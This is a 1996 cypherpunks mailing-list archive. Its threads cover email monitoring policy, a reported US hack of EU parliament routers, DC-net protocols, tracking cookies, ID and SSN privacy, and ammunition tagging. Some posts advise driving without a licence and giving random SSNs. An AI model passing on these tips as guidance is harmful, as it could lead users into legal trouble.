    "Electronic mail may be monitored if there is sufficient reason to
     believe that it is being improperly used which includes, but is not
     limited to: mail to competitors, more than 20 recipients (spam), and
     incoming mail from questionable sources.  If such monitored mail is
     encrypted the employee must provide a clear text version of the mail
     which is to be unencrypted under supervision to avoid substitutions.
     Any employee refusing to make available such mail will be ...."

  Just remember, as was said, once you make a policy it becomes precedence
and will stick with you forever... longer if it's a bad one.

Best Wishes
   Jim
Jim Sewell - jims@tansoft.com    Tantalus Incorporated - Key West, FL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Tue, 6 Aug 1996 08:07:58 +0800
To: cypherpunks@toad.com
Subject: Public report of the EU crack.
Message-ID: <199608052120.OAA06066@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hallam-Baker wrote:

>I consider the political dimension of this affair to 
>be more significant that the technical. This brings the
>US and the French into the same category of anti-crypto
>government with a habit of poking its nose into other
>people business and getting caught.
>
>		Phill

Say what?  John Young I can understand; this blather?

Att: "Doc" Baker/Mr. Hyde, err, Hallam: any rudimentary text on
diction/grammer/syntax might be helpful to you.

Sheesh!  At least Sternlight seemed to be acquainted with the English language.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 6 Aug 1996 08:35:29 +0800
To: Martin Minow <minow@apple.com>
Subject: Re: fbi, crypto, and defcon
Message-ID: <199608052125.OAA29181@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:40 AM 8/5/96 -0700, Martin Minow wrote:
>Arun Mehta <amehta@giasdl01.vsnl.net.in> writes:
>>True, though even better would be simply to charge you a flat
>>rate. If billing is that expensive, why bother?

>Tragedy of the Commons.
>
>Flat rate works only if no single user can use more than
>a tiny fraction of the total bandwidth.

Using a "Tragedy of the Commons" analysis on telecommunications systems 
isn't very appropriate.  Modern telephone systems have a fairly well-defined 
instantaneous capacity, do not wear out based on usage, unused capacity 
doesn't 'store up' for later use, nor do sporadic attempts at excessive use 
have anything more than a very transitory effect.  (fast busy signals.)  And 
in addition, a person doesn't profit in an unlimited fashion by attempting 
to over-use the telephone:  Nobody I know would spend 24 hours per day on 
the phone if it were free, for example.  So there's little motivation to 
over-use the resource.

The Internet is even more "friendly" along these lines than telephone 
systems:  The Internet doesn't "fail hard," denying access when usage is 
high, it merely slows all access to match the need.  There are enough 
differences that I think Internet deserves an entirely new analysis.  Don't 
worry, it will be also be interesting, from a game-theory perspective, but 
it will be very distinct from a classic "tragedy of the commons" situation.  

The current question is how to motivate individuals and companies to invest 
in improvements to the Internet that will benefit everyone. However, I don't 
think that will be the limiting factor that it may currently appear to be.  
Due to the nature of the Internet, there is nothing to prevent a company 
(such as AOL, Compuserve, or other) from building a shadow version of the 
Internet, through which all of its customer's traffic will pass until it 
emerges local to its destination.  Customers who appreciate this kind of 
prompter service will be motivated to pay slightly more and will buy 
Internet access through that company.  So the "commons" won't be quite so 
"common," and product differentiation will allow choice.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 6 Aug 1996 08:08:25 +0800
To: Laszlo Vecsey <master@internexus.net>
Subject: Re: Destroying client/server model, anonymous broadcasting.
Message-ID: <199608052126.OAA28317@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:42 AM 8/5/96 -0400, you wrote:
>Getting back to the Dining Crypto Problem, is it possible to complete a
>round by passing information around the circle of participants (each
>individual communicates and maintains a connection with the person on the
>left and right) rather than sending the round results to everyone via a
>central server that everyone is connected to? In effect no one would be a
>server, or everyone would be a server depending on the way you look at it.
>A circular linked list would be maintained and kept in sync by every
>client so that error recovery could come into play if someone mysteriously
>disconnects. Could it work? How would the protocol differ.

There's an obvious simple way to do this which appears to be slightly wrong.
Somebody (assume it's Alice) announces a round "This is round N, size S 
bytes, value vvvv....", everybody who receives it does their calculations, 
XORs them in with the data, and passes it on.  Once it gets all the way
around (and Alice xors in her real number xor the nonce she started with),
it goes around again so everybody can see the message.

The catch is that two players can collude to monitor the player between them.
Since Eve knows what data she passed (Dr.) Fred, and their random numbers,
and Gorby knows what Fred passed him, and their random numbers,
they can tell whether Fred added any data of his own.  With a server-based
system, on the other hand, collusion that Eve and Gorby also find out
Fred's output, either by eavesdropping or colluding with the server.
(Hmmm - I suppose this also happens with Chaum's NSA dinner?  The example
essentially used broadcast to exchange all the users' contributions.)

Also, to set up a DCnet, you almost need a server of some sort to coordinate
who talks to whom.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Tue, 6 Aug 1996 08:57:47 +0800
To: net-thinkers@thumper.vmeng.com
Subject: Credit Cards over the internet
Message-ID: <v0300780aae2c29df08c4@[204.179.131.29]>
MIME-Version: 1.0
Content-Type: text/plain


Just read a forwarded message from a merchant who indicated that:

<quote>
Mastercard in no way authorises the transmission of credit card details via
the internet/email due to the possibility of fraud. Supposedly if
Mastercard finds that any merchant receives such details via
internet/email, they will cancel the merchants agreement/rights
immediately. While a lot of work is being done regarding the transmission
of secure data it has not been perfected yet. Merchants must have special
permission to accept details by phone or fax.
</quote>

We have no first hand knowledge of this change in the merchant account rules.

As a merchant who accepts credit cards via the internet/email, I know that
our credit card fraud rate is around 1 in 1403 transactions. In all cases,
the card we were given was stolen by conventional means and the charge was
authorized before that knowledge filtered through the credit card system.
Seems to me that this is a small percentage.

I have heard of no one who has had their card stolen while passing it
across the internet. Local restaurants and shops and Unix file servers,
yes, but via packet sniffing, no.

If the above internet/email restriction is true and if we assume that the
people at the credit card companies do know what they are doing, then it
sounds like someone might be attempting to kill the SSL method of accepting
credit card information in favor of some other standard such as SET. I'd be
willing to bet that SET will be proclaimed as the perfected method that is
suitable for use where other methods such as SSL or PGP would not be
allowed. I'd also be willing to bet that even with SET, the fraud rate that
I experience will remain the same.

Does anyone have real facts on this?

<name withheld>


Vinnie Moscaritolo
"Law - Samoan Style"
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 6 Aug 1996 06:24:53 +0800
To: cypherpunks@toad.com
Subject: Public report of the EU crack.
Message-ID: <9608051858.AA08707@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>From the Sunday times:- 

http://www.sunday-times.co.uk/news/pages/Sunday-Times/stifgnnws01015.html?youra-c


AMERICAN intelligence agents have hacked into
the computers of the European parliament and
European commission as part of an international
espionage campaign aimed at stealing economic and
political secrets, according to investigators, write
Tim Kelsey and David Leppard. 

The European parliament has called in British
communications experts to improve its security and
to block further attempts by American govern ment
agents to spy on its workings. 

Security officials at the parliament's Luxembourg
offices say they have discovered several recent
instances in which its communications system was
compromised by American hacking. They have also
found evidence that the Americans used information
obtained from hacking to help them in negotiations
last year on the General Agreement on Tariffs and
Trade (Gatt). 

Lord Plumb, leader of the British Tory MEPs in the
European parliament, said he was shocked by the
disclosure. "I will be taking this up directly with the
American ambassador [to the European Union]," he
said. 

The CIA has already been accused by the Japanese
and French governments of hacking into their
communications networks in an attempt to obtain
confidential trade secrets. 

The European parliament's computer network links
more than 5,000 MEPs, officials, researchers and
other staff to each other, and to the European
commission headquarters in Brussels and the council
of ministers. 

Traffic across the network by telephone and
computers includes details of the private medical
and financial records of many MEPs and officials,
and discussion documents on confidential issues,
including trade, tariff and quota agreements. The
records of closed committees of inquiry into BSE
and fraud are also stored on the system. 

European parliament sources say the Americans
accessed the network by compromising the
information exchanges that link the parliament's
internal networks with the Internet and external
users. 

The devices, called "routers", filter entry to the
European parliament's network. It is understood the
Americans were able to obtain access to what is
called the simple network management protocol
(SNMP), the language that enables the networks to
talk to each other. They were able to exploit the fact
that parts of the system were manufactured by two
American firms. 

The breach came to light when officials believed
that American negotiators had been given advance
warning of confidential European Union positions
in last year's trade negotiations. "It was established
that the system had been penetrated just days before
the talks," an EU source said. "Our principal
concern is not to establish what has already been
copied but to ensure that it does not happen again.
This is an on-going problem." 

A spokeswoman for Antonio Cavaco, director of
data processing at the commission, confirmed that
allegations of hacking had been investigated.
However, she said she was unable to provide any
details. 
[end]

I consider the political dimension of this affair to 
be more significant that the technical. This brings the
US and the French into the same category of anti-crypto
government with a habit of poking its nose into other
people business and getting caught.

		Phill











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@IO.COM>
Date: Tue, 6 Aug 1996 07:58:49 +0800
To: jims@MPGN.COM (James C. Sewell)
Subject: Re: Corporate e-mail policy
In-Reply-To: <2.2.32.19960805173421.0075df00@tansoft.com>
Message-ID: <199608052008.PAA19323@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 11:22 PM 8/3/96 -0400, Rabid Wombat wrote:
> 
> > What you 
> >publish as a use policy, and what you actively enforce do not have to be 
> >the same.
> >
> 
>   Unfortunately this is a problem in many companies.  There are policies
> which are enforced to the letter, guidelines which are just suggestions,
> and fake-rules which are not even attempted to be enforced.
> 
>   The problem comes when the employee and employer can't distinguish
> them from each other.  
> 
>   Personally I think I would approach it as the privacy we have with the
> eontents of our car's trunk.  If an officer has probable cause to search
> the trunk then he can, otherwise he can't.  It's not a perfect system but
> it does work better than other alternatives I can think of.
> 
>   Write into your policy:
>     "Electronic mail may be monitored if there is sufficient reason to
>      believe that it is being improperly used which includes, but is not
>      limited to: mail to competitors, more than 20 recipients (spam), and
>      incoming mail from questionable sources.  If such monitored mail is
>      encrypted the employee must provide a clear text version of the mail
>      which is to be unencrypted under supervision to avoid substitutions.
>      Any employee refusing to make available such mail will be ...."

Personally, a policy may save or cause lots of money in losses.  My
recommendation:  Have an attorney look your policy over, or have him/her
write it for you.

It may cost some money, but may possibly save your company.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 6 Aug 1996 07:22:42 +0800
To: ichudov@algebra.com
Subject: Re: Integrating PGP 3.0 Library with INN
In-Reply-To: <199608051829.NAA19030@galaxy.galstar.com>
Message-ID: <199608052017.PAA09340@homeport.org>
MIME-Version: 1.0
Content-Type: text


Igor Chudov wrote:

| Has anyone thought of integrating PGP 3.0 library with INN? 
| 
| I was thinking along the lines of having PGPMoose support built
| right into INN: if an arriving article is posted to a moderated
| newsgroup for which a PGP key is available in the INN's keyring,
| INN verifies existence and correctness of a PGP signature.


| If moderators choose short enough keys (512 bits for example), this
| verification will not take any significant amount of CPU time.

Its my experience that at full feed sites, there isn't enough cpu to
do this.  A p-90 can get ovewhelmed pretty easily trying to keep up
with the load.  Trying to look into the body of an article means at
least a few hundred more ops per article.  You could do this on a leaf
node.  However, you cut the reliability of the system by adding things
to go wrong.  Better to have a scanner that checks specific moderated
groups after INN has deposited the articles.

Adam





-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 6 Aug 1996 07:49:18 +0800
To: cypherpunks@toad.com
Subject: Stealth cookies
Message-ID: <32065A8C.39FA@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


There's been a thread here about some outfit that, by being referenced
from web documents here and there, would insert its cookie in your
browser even though you've never directly visited that site.  I've
nuked any & all messages about that; if anybody recalls any details,
I'd be thankful for the information.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight
arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Schroth <Frank_Schroth@zd.com>
Date: Tue, 6 Aug 1996 07:39:58 +0800
To: zdnet <zdnet@news.zdnet.com>
Subject: Personal View @2.0 Released
Message-ID: <9608052256.AA4175@mail.zd.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear ZD Net Member:

We're pleased to announce that the all-new ZD Net Personal View, 
the Web's premier source for personalized computing news, is now 
available at no charge, exclusively to registered members of ZD 
Net. 

With computing news and information -- now from over 650 respected 
sources -- ZD Net's Personal View allows you to create your own 
computing information service on the Web, tailored to track only 
the information that matters most to you.  

Save time searching and surfing.  Use Personal View to get a wide 
spectrum of coverage on the computing information you need to stay 
ahead.  And remember, it's all available in one place, it's updated 
24 hours day and it's FREE for our registered users!

We'd like to invite all of our ZD Net members to put the new 
Personal View to work for you. Click on the Personal View link on 
ZD Net's home page or go direct to www.pview.com to check out our 
brand-new look and, more importantly, all of our new features:

     -- More news from a wider range of sources (over 650!), 
     -- Expanded search capabilities (including 2 months of archived 
        information)
     -- More flexibility in creating your personal Profile
     -- Plus links to the very latest ZD Net news and features 
        related to your unique interests.

If you've already come to rely on Personal View, we know you'll be 
impressed with the improvements we've made. And if you haven't had 
the chance to visit Personal View, now is the perfect time. Just 
point your browser to www.pview.com, take a minute to set up your 
Custom profile and you'll have you're own personal information 
service on the WWW.

Thank you for your continued use of ZD Net!    We look forward to 
serving your computing information needs for a long time to come.

Sincerely,
ZD Net Personal View Team 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 6 Aug 1996 08:01:03 +0800
To: Black Unicorn <stewarts@ix.netcom.com>
Subject: Re: Internal Passports
Message-ID: <2.2.32.19960805194823.0087b730@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Aug 1996, Bill Stewart wrote:

>> You can still travel in a car if someone else is driving,
>> and you can still get on a train without identification,
>> but without papers you can't fly or drive, and you can't
>> ride a horse on the freeway except in the back of a horse trailer.
>> Driver's licenses were the beginning of a long downhill trend.

Don't forget the bus.  Of course you can still drive a car without a DL.
Just don't get stopped.  Additionally, driving without a license is a pretty
minor offense.  Stick with cheap cars so confiscation isn't a problem.  Most
also forget that the Driver's License can be issued by any nation on earth.
Some countries have easier standards for license issuance.

Strange facts about cars and drivers in the US:

1)  It is legal for an unlicensed driver to own or drive an unregistered car
as long as he stays off the public streets and roads (what for expansion of
the definition of public streets and roads).

2)  It is legal for a licensed driver to drive a car owned by some other
person or legal entity.  Ownership and control can be two different things.

3)  A car can be registered in other states or in other countries and still
be driven anywhere in the US.

4)  A licensed driver is one with a license from any jurisdiction on earth
(try to stick to ones most cops have heard of).

5)  A US court cannot suspend a foreign license (but they can bust you for
other stuff if you get caught in the same local jurisdiction twice.)

>> I wonder if they'll still accept an American passport; the country
>> has obviously been taken over by Pod People while we weren't looking....
>

At 12:52 PM 8/5/96 -0400, Black Unicorn wrote:

>I often have trouble with foreign passports and one of my associates often
>has extensive problems trying to use an american passport for anything in
>the United States.
>
>Comments uttered in my presence on the subject have included:
>
>"We don't accept THOSE."
>
>"Sorry, we need to see OFFICIAL identification."
>
>"Don't you have something state issued?"
>
>"Uh, we need a driver's license number."

At least the Passport doesn't have your address or much useful information
on it.  And if you've done things properly, it's not connected to your SS
number.  Should work for flight ID at the airport these days, however.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anne Eisenberg <aeisenb@duke.poly.edu>
Date: Tue, 6 Aug 1996 07:25:06 +0800
To: cypherpunks@toad.com
Subject: Cookies on Microsoft Explorer?
Message-ID: <Pine.SUN.3.93.960805154442.12332B-100000@duke.poly.edu>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone know what the equivalent technology is on Microsoft to
Netscape's cookie technology?  Does Microsoft have support for cookies or 
not?  

All of the discussion on the list to do with
cookies is related to Netscape.  Does this mean that if one switches to
Microsoft Explorer one can avoid the problem?  Many thanks.

Anne Eisenberg
aeisenb@duke.poly.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 6 Aug 1996 09:27:53 +0800
To: cypherpunks@toad.com
Subject: Re: Public report of the EU crack.
Message-ID: <199608052306.QAA04853@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:20 PM 8/5/96 -0700, David M. Rose wrote:
>Hallam-Baker wrote:
>
>>I consider the political dimension of this affair to 
>>be more significant that the technical. This brings the
>>US and the French into the same category of anti-crypto
>>government with a habit of poking its nose into other
>>people business and getting caught.
>>
>>		Phill
>
>Say what?  John Young I can understand; this blather?
>
>Att: "Doc" Baker/Mr. Hyde, err, Hallam: any rudimentary text on
>diction/grammer/syntax might be helpful to you.


Have a little toleration.  I've heard he's a FOREIGNER!
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 6 Aug 1996 10:04:48 +0800
To: cypherpunks@toad.com
Subject: Re: SSNs (was Re: Internal Passports)
In-Reply-To: <320652BC.31DF@netscape.com>
Message-ID: <199608052313.QAA18497@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jamie Zawinski wrote:

> If you already have a SSN, can you get a *new* one in any legal way?
> (Sort of the same idea as changing your phone number to avoid
> telemarketing scum...)

The original SSN was never intended to be used as a form of 
identification, or so the government claimed.  You may request
from the government a taxpayer ID number, which you may then use
in lieu of your SSN for identification purposes, if you desire
to hold the government to its original promise. 

Of course, using a Taxpayer ID everywhere provides you with no more
anonymity than using an SSN everywhere.  Such is life. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 6 Aug 1996 08:03:34 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Internal Passports
In-Reply-To: <Pine.SUN.3.94.960805124757.25001A-100000@polaris>
Message-ID: <Pine.SUN.3.91.960805162736.4762C-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've been using by british passport as photo-id for years, and I haven't 
had any major problems- you can get your checks printed with your 
passport number on them instead of a drivers licence, which will makes 
things much easier.

Simon

---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@prairienet.org>
Date: Tue, 6 Aug 1996 08:34:08 +0800
To: cypherpunks@toad.com
Subject: PGP public key servers are useful! [noise?]
Message-ID: <199608052141.QAA15347@bluestem.prairienet.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Mon Aug 05 16:43:42 1996
Over the last couple of weeks, I've noticed a lot
of subscribers who PGP clearsign their messages,
but who haven't uploaded their keys to any of
the public keyservers.

Those keys are most useful when they're
available to people who might want to use them,
so I'm asking those of you who haven't sent
them to a keyserver to do so.

(The quick version: paste your key in cleartext
into a letter, sent to pgp-public-keys@pgp.mit.edu
with the subject: ADD.  If you don't have it
in cleartext, do pgp -kxa and follow the prompts.)

TIA,
dave





- ---- David E. Smith  POB 324  Cape Girardeau MO USA 63702
dsmith@prairienet.org   http://www.prairienet.org/~dsmith
send mail of 'send pgp-key' subject for my PGP public key
  "Heard a lot of talk about this Jesus, a man of love,
   a man of strength; but what a man was two thousand
    years ago means nothing at all to me today ... "
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Automagically signed with Pronto Secure for Windows.

iQEVAwUBMgZrGzVTwUKWHSsJAQGRtwf/TPjleUXsqf2GcEsutZNnyYD82bYM2ZT/
NQm0BeUTcNdU+jA/2z5aiy+FRozcL6EeIDPULtCGeMvDYu95vBOjnimIxMjng9J6
mIpFIQzXUN4ZDdE7m1khbn8Vdk/V0kehQL318LzB484SQILWNYvTNrj/cDq6CdKW
RMyyOH3+5VH1xRZJjFYvTsKnCszmtZIIvrjOt9+nX/j02bWnZRV7IGbOFjSrCL6p
r1TZG/TnU60YGz/TaUhp5OCj0bFlkFQlg+NmcwR9j4rlIza9ujBSuGIcflMRWTG3
ighrCC9cpL1v/qJkHXKy67xdvIZWlq7UiyqTRUEBg7rwjSBca0YgZQ==
=rDtm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Tue, 6 Aug 1996 12:25:44 +0800
To: cypherpunks@toad.com
Subject: Public report of the EU crack.
Message-ID: <199608060012.RAA06035@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Well, well, well!

So we gain a several allies in our battle against key-escrow, and
lo and behold, it's all the *other* governments who don't want
Uncle Sam to read their mail.

I hope that any c'punks in foreign countries can make some politcal
hay with this: "Don't let the yankee imperialists tell us a goddamn thing
about crypto policy!  They'll only use it to pull weasel moves in the
trade talks!"

Actually, it might be a good thing for Her Majesty's government to 
issue an advisory, saying not to buy US routers and encryption software,
because it can't be trusted, under present US ITAR rules.

-jcr






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Tue, 6 Aug 1996 08:18:25 +0800
To: cypherpunks@toad.com
Subject: Re: Stop the presses -- Anti-terrorism bill not that bad
In-Reply-To: <19960805204130906.AAA148@maverick>
Message-ID: <9608052116.AA09050@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



> First off, a large number of 
>guns used in homicides are revolvers or derringers (anyone got the 
>numbers?).  These guns don't spit out the shells.  So, it would be 
>utterly useless to do so.  

The shells are removed sometime or other. Nothing is a 100% solution
but anything that gives the criminal an extra thing to worry about 
improves the chances that a mistake is made.

Many people go to jail because of fingerprints on shell cases.

>The second problem is the number of shells 
>expelled in the US every day.  I doubt there's enough room on the 
>butt end of a shell to print that number (it couldn't be printed on 
>the sides, as this would screw up the fit of the shell, and possibly 
>weaken it).  

I doubt that more than 32 bits of info will be required. Thats not 
that difficult to imprint.

>And, it'd be almost impossible getting gun manufacturers to
>pay for the equiptment that it would take to emprint serial numbers.  

Not a problem, that type of machinery is a standard type of 
industrial machine. Might be expensive to adapt the lines but 
I doubt it.


>The third number is that cartridges 
>are recycled.  Aside from reloading your own, there's a large number 
>of people that sweep up brass from gun ranges to reload themselves.  
>The idea that someone swept up the brass could get almost anyone off. 

Not an issue. A person may have an excuse that explains why
the blood is in his car or his fingerprints are on the knife but
a conviction depends on more than one piece of evidence. If 
there is information that gives the police a lead it is 
usefull.

At present the police are investigating the purchase of white 
powder - checking each purchaser out who fits the Olympic
bomber profile. That is a lot of work for a much weaker lead.

If a person says that they fired at a range then you have 
narrowed the search scope to the guys at the range.

>The final problem is the paperwork.  Cops today can barly keep up 
>with the paperwork involved with the Brady Bill.  Could you imagine 
>if they had to keep track of AMMO purchases?

Not a problem, thats an opportunity. I build very large, very
high reliability computer systems. I can build machines that
deal with several million transactions a day for less than a 
million and run them for less than a quarter million a year. That
is cheap when one considers the cost of investigation saved.

>The provision to give people the means to commit treason against the 
>government are in the Constitution.  That's why the second amendment 
>is there -- to empower the people to protect themselves against the 
>government. 

Making that argument defeats your case. Irespective of the framers
of the constitution nobody in Congress or the Administration believes
that you have a right to take up arms against the government. In
fact they are scared of the militia movement and the NRA. Every time
you make that argument you make it harder for people to accept your
case. 

Its like hearing a Marxist spout stuff from Capital to support a
civil liberties. Regardless of wether the content makes sense the
form of the argument is a complete turn off. 

I used to side with HCI before I started talking to the 
talk.politics.guns people. That convinced me that they were a threat
to the security of the country - even before McVeigh sent me a
mail defending his 2nd ammendment rights that looked very 
much like yours. Regardless of whether he is guilty or not I
still regard him and those that hold his views to be as 
serious a threat to the USA as the Red Army Faction were in
Germany, or the Red Brigades in Italy or the IRA in the UK.

If people carelessly justify terrorism they are fueling that
fire. Up until now the US has not had a serious terrorist 
problem. If terrorism becomes widespread then don't imagine
the constitution will be a protection. Thomas and Reinquist 
are not going to stop measures to "protect the nation" even
if like the WWII internement of Japaneese nationals they are in
gross violation of the constitution. 

If you think the wiretap bill is bad think on this, all guns
of all types banned except where held by special license.
Checkpoints at major road intersections. Stop and search
patrols in city centers and the army on the street. Its not
at all far fetched, the UKgovt took less than a year to 
introduce such measures in Northern Ireland. Constitution or
not, don't expect that the US Congress won't make a similar 
response.


	Phill








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 6 Aug 1996 11:31:15 +0800
To: Jamie Zawinski <jwz@netscape.com>
Subject: Re: SSNs (was Re: Internal Passports)
Message-ID: <2.2.32.19960806003317.00a56cac@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:59 PM 8/5/96 -0700, you wrote:
>Black Unicorn wrote:
>> 
>[ ...random losers asking for your SSN... ]
>> > I was horrified and gave a random number.
>> 
>> You should always be horrified, and always give a random number.
>
>Well, it would be nice if it was that easy.  You (legally) need to give
>the correct one to anyone who has to make a report about you to the IRS,
>right?  Such as your employer.  But it's not always clear who else needs
>it. 

Originally the 1939 ('37?) Social Security Act explicitly stated that the
SSN could not be used for anything except SSA matters. Times apparently have
changed or perhaps it's just de facto legislation by complicity.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 6 Aug 1996 13:05:16 +0800
To: cypherpunks@toad.com
Subject: Re: Stealth cookies
Message-ID: <2.2.32.19960806003319.00a5a274@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Doubleclick was the company.

They place banner ads on other pages that deliver a cookie header to your
browser. Their trick is a script that delivers a cookie along with the graphic.
Here's a sample from one of their own ads:

Set-Cookie: IAF=x; path=/; expires=Wed, 09-Nov-99 23:59:00 GMT


And right from the horses mouth:
"DoubleClick has created the largest and most complete user and
organization database on the Internet. DoubleClick is able to tell an
incredible amount of information about a user, such as operating system,
location, organization name, type, revenue, and size (click here for a
more detailed description of target selection criteria). Along with
sophisticated scheduling and our incredible DART software,
DoubleClick is able to automatically and dynamically assign the best ad
banner for a user."

and

"DoubleClick development ad banners are designed to capture more
data about an individual or to attract potential advertisers, both of which
ultimately benefit all DoubleClick Network member Web sites."

Pomp and Puffery. But it makes the marketeers drool.

As a user downloads more doubleclick banners, the cookie allows doubleclick
to  accumulate more crumbs in the form of url of the referring page. Just as
traditional marketing demographics were founded on what magazines one
subscribes, web advertising hopes to build demographics on what pages you view. 

Solution?

1) Don't put your name in the netscape configuration (d'oh)
2) make your cookie.txt file read only
3) use www.anonymizer.com when surfing

Turning of "auto-load images" will not prevent the doubleclick cookie from
being transmitted or recieved.

aside note:
there is a current cp archive at http://infinity.nus.sg/cypherpunks/ but it
could use a local search tool.

--j

At 03:33 PM 8/5/96 -0500, you wrote:
>There's been a thread here about some outfit that, by being referenced
>from web documents here and there, would insert its cookie in your
>browser even though you've never directly visited that site.  I've
>nuked any & all messages about that; if anybody recalls any details,
>I'd be thankful for the information.
>
>______c_____________________________________________________________________
>Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
>       m5@tivoli.com * m101@io.com          *    
>      <URL:http://www.io.com/~m101>         *    three heads and eight
>arms.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 11:27:48 +0800
To: cypherpunks@toad.com
Subject: The futility of trying to "tag" ammunition
Message-ID: <ae2bdb75040210042746@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:38 AM 8/5/96, Sean Sutherland wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Hallam-Baker Wrote --
>> Date:          Sun, 04 Aug 1996 20:20:20 -0400
>
>> I personally think that tagants is an insuffieicent approach to
>> the problem. Given the number of gun related homicides in the
>> US it is not unreasonable to require each individual cartridge
>> to be stamped with a serial number and for gun dealers to be
>> required to record each individual purchase. That at least
>> was my advice to the UK govt after Dunblane.
>
>There's four major problems with this.  First off, a large number of

Actually, there are so many problems with this that I dismissed Phill's
"plan" out of hand. But since others are weighing in on it, I might as
well, too.

It has little CP relevance, except that it parallels other seemingly well
though-out proposals which crumble when some common sense analysis is used.


The key point is this:

A billion rounds of ammunition already out in the U.S. +

Perps typically fire fewer than 5 rounds in committing their crimes  +

Incredible logistical problems in tagging and tracking shells  =

An idea shot down.

>guns used in homicides are revolvers or derringers (anyone got the
>numbers?).  These guns don't spit out the shells.  So, it would be

Most older guns in the hands of street punks are revolvers, though this is
not necessarily where handgun homicides mostly come from. Those are "home
shootings"--a man kills his wife, a woman kills her husband, a brother
shoots a brother, etc. Most of these are done with guns that are handy and
that have been in the family/house for a long time....most are, thus,
revolvers.

(The 1911 .45 is moderately common, but not nearly so much so as old .38s
and even .22s.)

In any case, Phill's proposal would collapse for this situation. First, the
guns are very old and the ammo would not be the new "tagged cases." (In
most cases, a old "box of shells." Most home owners of guns never fire
practice rounds and tend to have a few boxes at most of shells, which they
keep for many, many years.)

And in most home killings, it becomes clear real fast who did the shooting.
And, as Sean notes, these revolvers will not eject the shells.

It is marginally possible that spent shells could be identified when fired
from semi-automatics, of course. Other factors to consider, though:

1. The vast amount of ammo already out there. Given that perps typically
fire only a handful in their criminal career, not hard to just use older
ammo.

(The Sternlight-favored argument might be invoked here: "Ah, but criminals
are too stupid to do this, and so it will help." I disagree. Most street
